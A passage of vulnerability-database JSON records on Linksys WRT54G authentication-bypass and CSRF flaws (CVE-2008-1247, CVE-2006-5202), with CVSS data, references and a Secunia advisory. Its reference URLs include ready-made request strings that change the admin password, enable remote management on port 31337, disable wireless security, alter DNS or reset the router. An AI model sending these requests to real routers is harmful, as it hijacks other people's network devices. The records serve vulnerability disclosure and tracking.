the Linksys WRT54G \nfirmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care \nwhether or not you have the level of privilege thought to be necessary for manipulating sensitive \nobjects. \n\nThanks go to hw2B for suggesting I write all of this garbage out. \n\n++| URLs\n----------------------\nhttps://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document)\nhttps://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008)\nhttps://kinqpinz.info/lib/wrt54g/own2.txt (this document)\nhttp://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-31372",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1247",
"trust": 3.0
},
{
"db": "BID",
"id": "28381",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "29344",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "5926",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "5313",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "MILW0RM",
"id": "5313",
"trust": 0.6
},
{
"db": "MILW0RM",
"id": "5926",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "XF",
"id": "41118",
"trust": 0.6
},
{
"db": "MISC",
"id": "HTTP://KINQPINZ.INFO/LIB/WRT54G/OWN.TXT",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "67644",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "64904",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-65280",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-8833",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-31372",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "64785",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"id": "VAR-200803-0170",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:26:38.262000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://kinqpinz.info/lib/wrt54g/own.txt"
},
{
"trust": 1.9,
"url": "https://kinqpinz.info/lib/wrt54g/"
},
{
"trust": 1.8,
"url": "https://kinqpinz.info/lib/wrt54g/own2.txt"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/28381"
},
{
"trust": 1.7,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/29344"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/5313"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/5926"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41118"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1247"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1247"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.milw0rm.com/exploits/5926"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/41118"
},
{
"trust": 0.6,
"url": "http://www.milw0rm.com/exploits/5313"
},
{
"trust": 0.3,
"url": "http://www.linksys.com"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/security.tri?securitymode=0\u0026layout=en"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-1247"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/factdefa.tri?factorydefaults=yes\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/basic.tri?dhcp_end=149\u0026oldmtu=1500\u0026oldlansubnet=0\u0026oldwanmode=0\u0026sdhcp1=192\u0026sdhcp2=168\u0026sdhcp3=1\u0026sdhcp4=100\u0026edhcp1=192\u0026edhcp2=168\u0026edhcp3=1\u0026edhcp4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=wrt54g\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=1\u0026dns0_1=2\u0026dns0_2=3\u0026dns0_3=4\u0026dns1_0=5\u0026dns1_1=6\u0026dns1_2=7\u0026dns1_3=8\u0026dns2_0=9\u0026dns2_1=8\u0026dns2_2=7\u0026dns2_3=6\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29\u0026daylight_time=on\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/dmz.tri?action=apply\u0026dmz_enable=1\u0026dmz_ipaddr=100\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/factdefa.tri\"\u003e"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/basic.tri\"\u003e"
},
{
"trust": 0.2,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-1247"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/dmz.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://www.intoto.com/company.shtml."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ctlog.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri?wl_macmode1=0"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/vpn.tri\"\u003e"
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/lib/wrt54g/,"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri?remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026passwdmodify=1\u0026http_passwd=asdf\u0026http_passwdconfirm=asdf\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=0\u0026upnp_enable=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/dmz.tri?action=apply\u0026dmz_enable=0\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tracert.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/config.bin\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/config.bin."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri?remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026passwdmodify=1\u0026http_passwd=asdf\u0026http_passwdconfirm=asdf\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=1\u0026http_wanport=31337\u0026upnp_enable=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/factdefa.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/rstatus.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri?submit_type=\u0026channelno=11\u0026oldwirelessmode=3\u0026mode=3\u0026ssid=pwnage\u0026channel=6\u0026freq=6\u0026wl_closed=1\u0026sesmode=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ptrigger.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/dmz.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ping.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri?dhcp_end=149\u0026oldmtu=1500\u0026oldlansubnet=0\u0026oldwanmode=0\u0026sdhcp1=192\u0026sdhcp2=168\u0026sdhcp3=1\u0026sdhcp4=100\u0026edhcp1=192\u0026edhcp2=168\u0026edhcp3=1\u0026edhcp4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=wrt54g\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=0\u0026dns0_1=0\u0026dns0_2=0\u0026dns0_3=0\u0026dns1_0=0\u0026dns1_1=0\u0026dns1_2=0\u0026dns1_3=0\u0026dns2_0=0\u0026dns2_1=0\u0026dns2_2=0\u0026dns2_3=0\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29\u0026daylight_time=on\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/portrange.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/29344/"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/?page=changelog"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/"
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri."
},
{
"trust": 0.1,
"url": "http://\u003cremote_external_addr\u003e/manage.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1."
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/lib/wrt54g/."
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/index.php"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri?submit_type=\u0026channelno=11\u0026oldwirelessmode=3\u0026mode=3\u0026ssid=kinqpinz\u0026channel=6\u0026freq=6\u0026wl_closed=1\u0026sesmode=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri\","
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/index.php,"
},
{
"trust": 0.1,
"url": "http://www.hacker.tld"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31372"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "28381"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"date": "2008-03-26T21:47:04",
"db": "PACKETSTORM",
"id": "64904"
},
{
"date": "2008-03-21T21:12:32",
"db": "PACKETSTORM",
"id": "64785"
},
{
"date": "2008-06-24T19:34:03",
"db": "PACKETSTORM",
"id": "67644"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31372"
},
{
"date": "2009-04-29T20:56:00",
"db": "BID",
"id": "28381"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"date": "2018-10-11T20:31:17.277000",
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"date": "2008-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54g router web interface vulnerability allowing execution of arbitrary administrator operations",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.6
}
}
VAR-200610-0506
Vulnerability from variot - Updated: 2023-12-18 11:20
Linksys WRT54g firmware 1.00.9 does not require credentials when making configuration changes, which allows remote attackers to modify arbitrary configurations via a direct request to Security.tri, as demonstrated using the SecurityMode and layout parameters, a different issue than CVE-2006-2559. Linksys WRT54G routers do not properly validate user credentials before allowing configuration changes. This is a different vulnerability from CVE-2006-2559. A third party may change any setting through a direct request to Security.tri. Linksys WRT54GS is prone to an authentication-bypass vulnerability. Reportedly, the device permits changes in its configuration settings without requiring authentication. The problem presents itself when a victim user visits a specially crafted web page on an attacker-controlled site. An attacker can exploit this vulnerability to bypass authentication and modify the configuration settings of the device. This issue is reported to affect firmware version 1.00.9; other firmware versions may also be affected. Linksys WRT54GS is a wireless router device that combines several functions.
TITLE: Linksys WRT54G Configuration Manipulation and Request Forgery
SECUNIA ADVISORY ID: SA21372
VERIFY ADVISORY: http://secunia.com/advisories/21372/
CRITICAL: Less critical
IMPACT: Hijacking, Manipulation of data
WHERE:
From remote
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: Ginsu Rabbit has reported a vulnerability and a security issue in Linksys WRT54G, which can be exploited by malicious people to conduct cross-site request forgery attacks and manipulate the configuration. [...] disable wireless security).
2) An error exists in the web interface caused due to the device allowing users to change the router configuration via HTTP requests without performing any validity checks to verify the user's request.
SOLUTION: Filter traffic to affected devices and do not visit untrusted web sites while being logged in to the device.
PROVIDED AND/OR DISCOVERED BY: Ginsu Rabbit
ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048495.html
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200610-0506",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.00.9"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "1.00.9"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.01.0.9"
},
{
"model": "wrt54h",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "4.71.1"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v51.0.10"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:1.00.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5202"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ginsu Rabbit is credited with the discovery of this vulnerability.",
"sources": [
{
"db": "BID",
"id": "19347"
}
],
"trust": 0.3
},
"cve": "CVE-2006-5202",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2006-5202",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-21310",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-5202",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#930364",
"trust": 0.8,
"value": "1.98"
},
{
"author": "CNNVD",
"id": "CNNVD-200610-087",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-21310",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54g firmware 1.00.9 does not require credentials when making configuration changes, which allows remote attackers to modify arbitrary configurations via a direct request to Security.tri, as demonstrated using the SecurityMode and layout parameters, a different issue than CVE-2006-2559. Linksys WRT54G routers do not properly validate user credentials before allowing configuration changes. This vulnerability CVE-2006-2559 Is a different vulnerability.By a third party Security.tri Any setting may be changed through a direct request to. Linksys WRT54GS is prone to an authentication-bypass vulnerability. Reportedly, the device permits changes in its configuration settings without requring authentication. \nLinksys WRT54GS is prone to an authentication-bypass vulnerability. The problem presents itself when a victim user visits a specially crafted web page on an attacker-controlled site. An attacker can exploit this vulnerability to bypass authentication and modify the configuration settings of the device. \nThis issue is reported to affect firmware version 1.00.9; other firmware versions may also be affected. Linksys WRT54GS is a wireless router device that combines several functions. \n\n----------------------------------------------------------------------\n\nHardcore Disassembler / Reverse Engineer Wanted!\n\nWant to work with IDA and BinDiff?\nWant to write PoC\u0027s and Exploits?\n\nYour nationality is not important. \nWe will get you a work permit, find an apartment, and offer a\nrelocation compensation package. 
\n\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\n\n----------------------------------------------------------------------\n\nTITLE:\nLinksys WRT54G Configuration Manipulation and Request Forgery\n\nSECUNIA ADVISORY ID:\nSA21372\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/21372/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nHijacking, Manipulation of data\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nGinsu Rabbit has reported a vulnerability and a security issue in\nLinksys WRT54G, which can be exploited by malicious people to conduct\ncross-site request forgery attacks and manipulate the configuration. disable wireless security). \n\n2) An error exists in the web interface caused due to the device\nallowing users to change the router configuration via HTTP requests\nwithout performing any validity checks to verify the user\u0027s request. \n\nSOLUTION:\nFilter traffic to affected devices and do not visit untrusted web\nsites while being logged in to the device. \n\nPROVIDED AND/OR DISCOVERED BY:\nGinsu Rabbit\n\nORIGINAL ADVISORY:\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048495.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. 
\n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "PACKETSTORM",
"id": "48845"
}
],
"trust": 2.79
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-21310",
